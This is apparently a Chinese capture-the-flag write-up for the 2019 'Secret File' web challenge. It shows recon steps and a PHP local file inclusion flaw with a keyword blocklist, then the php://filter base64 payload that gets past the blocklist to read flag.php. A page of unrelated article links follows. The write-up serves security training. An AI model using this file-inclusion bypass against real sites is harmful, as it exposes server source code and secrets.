[极客大挑战 2019]Secret File--详细解析

信息搜集

进入界面。黑底红字,有点恐怖。

查看源代码看看有什么信息:
找到一个/Archive_room.php页面,访问:
如果直接点这个按钮的话,会回显这样的界面:

找错地方了,退回/Archive_room.php页面,查看源代码:

发现/action.php,访问,发现还是跳转到了end.php界面。

怀疑是重定向,所有我们访问/action.php并抓包看看:

果然是302重定向,我们访问重定向页面里给的这个地址:
有include函数,应该是文件包含漏洞方面的考察。

信息搜集结束。

文件包含

php 复制代码
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>

strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串。如果是,则该函数返回 str1字符串从 str2第一次出现的位置开始到 str1结尾的字符串;否则,返回NULL。

strstr是大小写敏感的。

stristr是大小写不敏感的。

也就是我们上传的参数字符串中不能有 ../ tp input data这几个子串。

也就是我们不能使用data伪协议、input伪协议和通过相对路径直接查找flag文件。

所以我们选择php://filter伪协议。

php 复制代码
file=php://filter/convert.base64-encode/resource=<目标文件名>

这种方法得到的是base64编码后的文件内容,我们找个网站解码一下:

得到flag.

总结

信息搜集是Web安全的基本功,当找不到目标网页的时候,多抓包看看,会有收获。

相关推荐
xiaoyan20156 分钟前
最新Flutter3.32+Dart3仿微信App聊天实例
前端·flutter·dart
汪敏wangmin24 分钟前
Fiddler-抓包后直接生成Loadrunner脚本或者Jmeter脚本
前端·jmeter·fiddler
彤银浦1 小时前
Web学习笔记3
前端·笔记·学习·html5
江城开朗的豌豆1 小时前
退出登录后头像还在?这个缓存问题坑过多少前端!
前端·javascript·vue.js
江城开朗的豌豆1 小时前
Vue的'读心术':它怎么知道数据偷偷变了?
前端·javascript·vue.js
江城开朗的豌豆1 小时前
手把手教你造一个自己的v-model:原来双向绑定这么简单!
前端·javascript·vue.js
我在北京coding2 小时前
el-tree 懒加载 loadNode
前端·vue.js·elementui
江城开朗的豌豆2 小时前
v-for中key值的作用:为什么我总被要求加这个'没用的'属性?
前端·javascript·vue.js
angen20182 小时前
Ruby如何采集直播数据源地址
前端·chrome
goldenocean2 小时前
React之旅-05 List Key
前端·javascript·react.js